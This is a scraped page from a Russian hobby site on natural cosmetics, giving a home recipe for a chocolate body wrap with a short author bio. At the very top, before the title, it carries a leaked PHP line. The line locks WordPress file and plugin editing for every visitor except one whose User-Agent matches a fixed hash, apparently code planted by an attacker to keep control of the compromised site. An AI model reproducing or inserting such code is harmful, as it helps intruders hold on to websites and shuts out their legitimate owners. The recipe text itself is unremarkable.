if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Как приготовить смесь для шоколадного обертывания в домашних условиях | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Как приготовить смесь для шоколадного обертывания в домашних условиях

Все наслышаны о шоколадном обертывание. А знаете ли вы, что эту процедуру можно сделать самостоятельно у себя дома? Читайте, что для этого необходимо

Все наслы­ша­ны о шоко­лад­ном обер­ты­ва­ние. А зна­е­те ли вы, что эту про­це­ду­ру мож­но сде­лать само­сто­я­тель­но у себя дома?

Для этого необходимо:

  • моло­ко (400 мл);
  • горь­кий шоко­лад (1 плитка);
  • мас­ла апель­си­на и лимона.

Приготовление

Для изго­тов­ле­ния «рабо­чей сме­си» необ­хо­ди­мо подо­греть моло­ко так, что­бы оно не заки­пе­ло. При­бли­зи­тель­но до гра­ду­сов 80. В него необ­хо­ди­мо отпра­вить натер­тый на тер­ке шоко­лад. Сле­ду­ет про­сле­дить, что­бы шоко­лад рас­то­пил­ся пол­но­стью. В полу­чен­ную жид­кость необ­хо­ди­мо доба­вить несколь­ко капель одно­го из эфир­ных масел. Это может быть лимон­ное или апельсиновое.

Применение

Полу­чен­ную смесь необ­хо­ди­мо нане­сти на тело и обер­нуть при помо­щи пище­вой плен­ки. Оста­вить так на минут 20. После это­го тело необ­хо­ди­мо обмыть в теп­лой воде.

Совет

Если вы люби­те аро­ма­мас­ла, вы може­те доба­вить в эту молоч­но-шоко­лад­ную смесь любые аро­ма­ти­че­ские мас­ла, кото­рые вам нра­вят­ся. Таким обра­зом вы може­те само­сто­я­тель­но выбрать кос­ме­ти­че­ские рецеп­ты, кото­рые мак­си­маль­но под­хо­дят имен­но вам.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!